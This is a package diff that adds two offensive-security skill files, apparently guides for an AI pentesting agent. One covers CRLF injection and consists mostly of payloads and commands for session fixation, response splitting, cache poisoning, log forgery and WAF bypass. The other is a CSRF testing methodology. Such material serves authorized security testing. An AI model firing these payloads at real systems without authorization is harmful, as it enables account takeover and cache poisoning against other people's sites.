@aegis-scan/skills 0.4.0 → 0.5.1

package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md

@@ -0,0 +1,146 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: crlf-injection
+description: CRLF injection — HTTP header injection, response splitting, session fixation via Set-Cookie injection, log injection, and open redirect via Location header manipulation
+---
+
+# CRLF Injection
+
+CRLF = Carriage Return `\r` (0x0D) + Line Feed `\n` (0x0A). Injecting these into HTTP headers breaks response parsing → inject arbitrary headers, split responses, set cookies, achieve XSS.
+
+---
+
+## Detection
+
+    # Inject CRLF via URL parameter that appears in response headers (e.g., Location, Set-Cookie):
+    curl -v "http://target.com/redirect?url=https://example.com%0d%0aSet-Cookie:crlf=injected"
+    # If response contains: Set-Cookie: crlf=injected → vulnerable
+
+    # Encodings to try:
+    %0d%0a          # Standard URL encoding (\r\n)
+    %0a             # Just \n (sometimes sufficient)
+    %0d             # Just \r (rare)
+    %E5%98%8A%E5%98%8D   # Unicode alternative (%E5%98%8A = \n, %E5%98%8D = \r)
+    %E5%98%8A       # Unicode \n
+    \r\n            # Literal (if not URL-decoded)
+    \n              # Just newline
+
+    # In path:
+    curl -v "http://target.com/%0d%0aSet-Cookie:session=attacker"
+
+    # In User-Agent (if reflected in logs or headers):
+    curl -H "User-Agent: test%0d%0aSet-Cookie:session=attacker" http://target.com/
+
+---
+
+## Session Fixation via Set-Cookie Injection
+
+    # Inject Set-Cookie header:
+    http://target.com/login?redirect=%0d%0aSet-Cookie:SESSIONID=attacker_controlled_value;HttpOnly=false
+    # → Response includes: Set-Cookie: SESSIONID=attacker_controlled_value
+
+    # Victim visits crafted URL → browser sets attacker's session ID
+    # Attacker logs in with same session ID → session fixation → account takeover
+
+---
+
+## Open Redirect via Location Header
+
+    # If redirect parameter reflected in Location header:
+    curl -v "http://target.com/redirect?url=https://evil.com%0d%0aFoo:Bar"
+    # Response: Location: https://evil.com\r\nFoo: Bar
+
+    # Full redirect to attacker:
+    curl -v "http://target.com/redirect?url=https://evil.com%0d%0a%0d%0a<html>phishing"
+
+---
+
+## XSS via Response Splitting
+
+    # Inject complete second HTTP response:
+    # Parameter reflected in Location/redirect header:
+    http://target.com/redirect?url=%0d%0a%0d%0a<script>alert(document.cookie)</script>
+
+    # Inject Content-Type to enable XSS in JSON response:
+    curl "http://target.com/api?callback=foo%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert(1)</script>"
+
+---
+
+## Log Injection
+
+    # If user input logged (User-Agent, Referer, username):
+    curl -H "User-Agent: normaluser\n[CRITICAL] Admin login successful: admin:password123" http://target.com/
+    # Injects fake log entries → confuse forensics, hide real attack
+
+    # Combined with log viewer XSS:
+    curl -H "User-Agent: <script>alert('xss')</script>" http://target.com/
+    # If admin views logs in browser → XSS
+
+---
+
+## HTTP Response Splitting (Full)
+
+Inject two complete responses to poison caches or CDNs:
+
+    # Payload:
+    GET /redirect?url=https://example.com%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:text/html%0d%0aContent-Length:36%0d%0a%0d%0a<script>alert('cache-poisoned')</script> HTTP/1.1
+    Host: target.com
+
+    # If proxy caches the poisoned second response → all users get XSS
+
+---
+
+## Testing Locations for CRLF
+
+    # 1. Redirect parameters:
+    /redirect?url=INJECT
+    /redirect?next=INJECT
+    /redirect?return=INJECT
+    /redirect?returnUrl=INJECT
+    /redirect?goto=INJECT
+
+    # 2. Cookie parameters:
+    /login?sessionid=INJECT
+
+    # 3. Path-based:
+    /INJECT/page
+
+    # 4. Headers reflected in response:
+    User-Agent, Referer, X-Forwarded-For (if logged/reflected)
+
+    # Quick test all redirect params:
+    ffuf -u "http://target.com/redirect?FUZZ=test%0d%0aSet-Cookie:crlf=1" \
+      -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
+      -H "Content-Type: application/x-www-form-urlencoded" -mc all \
+      -fr "Set-Cookie: crlf=1"  # Match if injected header appears
+
+---
+
+## Automated Tools
+
+    # crlfuzz:
+    # go install github.com/dwisiswant0/crlfuzz/cmd/crlfuzz@latest
+    crlfuzz -u "http://target.com/" -v
+
+    # nuclei:
+    nuclei -t http/vulnerabilities/generic/crlf-injection.yaml -u http://target.com/
+
+    # Manual ffuf parameter discovery:
+    ffuf -u "http://target.com/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/common.txt \
+      -H "Test: val%0d%0aInjected:yes" -mr "Injected:"
+
+---
+
+## Pro Tips
+
+1. CRLF in `Location` header redirect is extremely common — test ALL redirect endpoints
+2. `Set-Cookie` injection without `HttpOnly` flag → steal cookies from other users (combined with CORS)
+3. Try both `%0d%0a` and `%0a` — some servers only strip one form
+4. Unicode encoding `%E5%98%8A%E5%98%8D` bypasses many WAFs that only filter ASCII CRLF
+5. Response splitting = cache poisoning on CDNs → amplified XSS affecting all users
+6. Log injection is often P4 but can be upgraded with log viewer XSS → P2/P1
+
+## Summary
+
+CRLF testing: inject `%0d%0aSet-Cookie:test=1` in redirect parameters → check response headers for `Set-Cookie: test=1`. Also test `Location` header injection and `%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>` for XSS. `crlfuzz` automates parameter discovery. Session fixation via cookie injection = high-severity ATO chain.

package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md

@@ -0,0 +1,200 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: csrf
+description: CSRF testing covering token bypass, SameSite cookies, CORS misconfigurations, and state-changing request abuse
+---
+
+# CSRF
+
+Cross-site request forgery abuses ambient authority (cookies, HTTP auth) across origins. Do not rely on CORS alone; enforce non-replayable tokens and strict origin checks for every state change.
+
+## Attack Surface
+
+**Session Types**
+- Web apps with cookie-based sessions and HTTP auth
+- JSON/REST, GraphQL (GET/persisted queries), file upload endpoints
+
+**Authentication Flows**
+- Login/logout, password/email change, MFA toggles
+
+**OAuth/OIDC**
+- Authorize, token, logout, disconnect/connect endpoints
+
+## High-Value Targets
+
+- Credentials and profile changes (email/password/phone)
+- Payment and money movement, subscription/plan changes
+- API key/secret generation, PAT rotation, SSH keys
+- 2FA/TOTP enable/disable; backup codes; device trust
+- OAuth connect/disconnect; logout; account deletion
+- Admin/staff actions and impersonation flows
+- File uploads/deletes; access control changes
+
+## Reconnaissance
+
+### Session and Cookies
+
+- Inspect cookies: HttpOnly, Secure, SameSite (Strict/Lax/None)
+- Lax allows cookies on top-level cross-site GET; None requires Secure
+- Determine if Authorization headers or bearer tokens are used (generally not CSRF-prone) versus cookies (CSRF-prone)
+
+### Token and Header Checks
+
+- Locate anti-CSRF tokens (hidden inputs, meta tags, custom headers)
+- Test removal, reuse across requests, reuse across sessions, binding to method/path
+- Verify server checks Origin and/or Referer on state changes
+- Test null/missing and cross-origin values
+
+### Method and Content-Types
+
+- Confirm whether GET, HEAD, or OPTIONS perform state changes
+- Try simple content-types to avoid preflight: `application/x-www-form-urlencoded`, `multipart/form-data`, `text/plain`
+- Probe parsers that auto-coerce `text/plain` or form-encoded bodies into JSON
+
+### CORS Profile
+
+- Identify `Access-Control-Allow-Origin` and `-Credentials`
+- Overly permissive CORS is not a CSRF fix and can turn CSRF into data exfiltration
+- Test per-endpoint CORS differences; preflight vs simple request behavior can diverge
+
+## Key Vulnerabilities
+
+### Navigation CSRF
+
+- Auto-submitting form to target origin; works when cookies are sent and no token/origin checks are enforced
+- Top-level GET navigation can trigger state if server misuses GET or links actions to GET callbacks
+
+### Simple Content-Type CSRF
+
+- `application/x-www-form-urlencoded` and `multipart/form-data` POSTs do not require preflight
+- `text/plain` form bodies can slip through validators and be parsed server-side
+
+### JSON CSRF
+
+- If server parses JSON from `text/plain` or form-encoded bodies, craft parameters to reconstruct JSON
+- Some frameworks accept JSON keys via form fields (e.g., `data[foo]=bar`) or treat duplicate keys leniently
+
+### Login/Logout CSRF
+
+- Force logout to clear CSRF tokens, then chain login CSRF to bind victim to attacker's account
+- Login CSRF: submit attacker credentials to victim's browser; later actions occur under attacker's account
+
+### OAuth/OIDC Flows
+
+- Abuse authorize/logout endpoints reachable via GET or form POST without origin checks
+- Exploit relaxed SameSite on top-level navigations
+- Open redirects or loose redirect_uri validation can chain with CSRF to force unintended authorizations
+
+### File and Action Endpoints
+
+- File upload/delete often lack token checks; forge multipart requests to modify storage
+- Admin actions exposed as simple POST links are frequently CSRFable
+
+### GraphQL CSRF
+
+- If queries/mutations are allowed via GET or persisted queries, exploit top-level navigation with encoded payloads
+- Batched operations may hide mutations within a nominally safe request
+
+### WebSocket CSRF
+
+- Browsers send cookies on WebSocket handshake
+- Enforce Origin checks server-side; without them, cross-site pages can open authenticated sockets and issue actions
+
+## Bypass Techniques
+
+### SameSite Nuance
+
+- Lax-by-default cookies are sent on top-level cross-site GET but not POST
+- Exploit GET state changes and GET-based confirmation steps
+- Legacy or nonstandard clients may ignore SameSite; validate across browsers/devices
+
+### Origin/Referer Obfuscation
+
+- Sandbox/iframes can produce null Origin; some frameworks incorrectly accept null
+- `about:blank`/`data:` URLs alter Referer
+- Ensure server requires explicit Origin/Referer match
+
+### Method Override
+
+- Backends honoring `_method` or `X-HTTP-Method-Override` may allow destructive actions through a simple POST
+
+### Token Weaknesses
+
+- Accepting missing/empty tokens
+- Tokens not tied to session, user, or path
+- Tokens reused indefinitely; tokens in GET
+- Double-submit cookie without Secure/HttpOnly, or with predictable token sources
+
+### Content-Type Switching
+
+- Switch between form, multipart, and `text/plain` to reach different code paths
+- Use duplicate keys and array shapes to confuse parsers
+
+### Header Manipulation
+
+- Strip Referer via meta refresh or navigate from `about:blank`
+- Test null Origin acceptance
+- Leverage misconfigured CORS to add custom headers that servers mistakenly treat as CSRF tokens
+
+## Special Contexts
+
+### Mobile/SPA
+
+- Deep links and embedded WebViews may auto-send cookies; trigger actions via crafted intents/links
+- SPAs that rely solely on bearer tokens are less CSRF-prone, but hybrid apps mixing cookies and APIs can still be vulnerable
+
+### Integrations
+
+- Webhooks and back-office tools sometimes expose state-changing GETs intended for staff
+- Confirm CSRF defenses there too
+
+## Chaining Attacks
+
+- CSRF + IDOR: force actions on other users' resources once references are known
+- CSRF + Clickjacking: guide user interactions to bypass UI confirmations
+- CSRF + OAuth mix-up: bind victim sessions to unintended clients
+
+## Testing Methodology
+
+1. **Inventory endpoints** - All state-changing endpoints including admin/staff
+2. **Note request details** - Method, content-type, whether reachable via simple requests
+3. **Assess session model** - Cookies with SameSite attrs, custom headers, tokens
+4. **Check defenses** - Anti-CSRF tokens and Origin/Referer enforcement
+5. **Attempt preflightless delivery** - Form POST, text/plain, multipart/form-data
+6. **Test navigation** - Top-level GET navigation
+7. **Cross-browser validation** - Behavior differs by SameSite and navigation context
+
+## Validation
+
+1. Demonstrate a cross-origin page that triggers a state change without user interaction beyond visiting
+2. Show that removing the anti-CSRF control (token/header) is accepted, or that Origin/Referer are not verified
+3. Prove behavior across at least two browsers or contexts (top-level nav vs XHR/fetch)
+4. Provide before/after state evidence for the same account
+5. If defenses exist, show the exact condition under which they are bypassed (content-type, method override, null Origin)
+
+## False Positives
+
+- Token verification present and required; Origin/Referer enforced consistently
+- No cookies sent on cross-site requests (SameSite=Strict, no HTTP auth) and no state change via simple requests
+- Only idempotent, non-sensitive operations affected
+
+## Impact
+
+- Account state changes (email/password/MFA), session hijacking via login CSRF
+- Financial operations, administrative actions
+- Durable authorization changes (role/permission flips, key rotations) and data loss
+
+## Pro Tips
+
+1. Prefer preflightless vectors (form-encoded, multipart, text/plain) and top-level GET if available
+2. Test login/logout, OAuth connect/disconnect, and account linking first
+3. Validate Origin/Referer behavior explicitly; do not assume frameworks enforce them
+4. Toggle SameSite and observe differences across navigation vs XHR
+5. For GraphQL, attempt GET queries or persisted queries that carry mutations
+6. Always try method overrides and parser differentials
+7. Combine with clickjacking when visual confirmations block CSRF
+
+## Summary
+
+CSRF is eliminated only when state changes require a secret the attacker cannot supply and the server verifies the caller's origin. Tokens and Origin checks must hold across methods, content-types, and transports.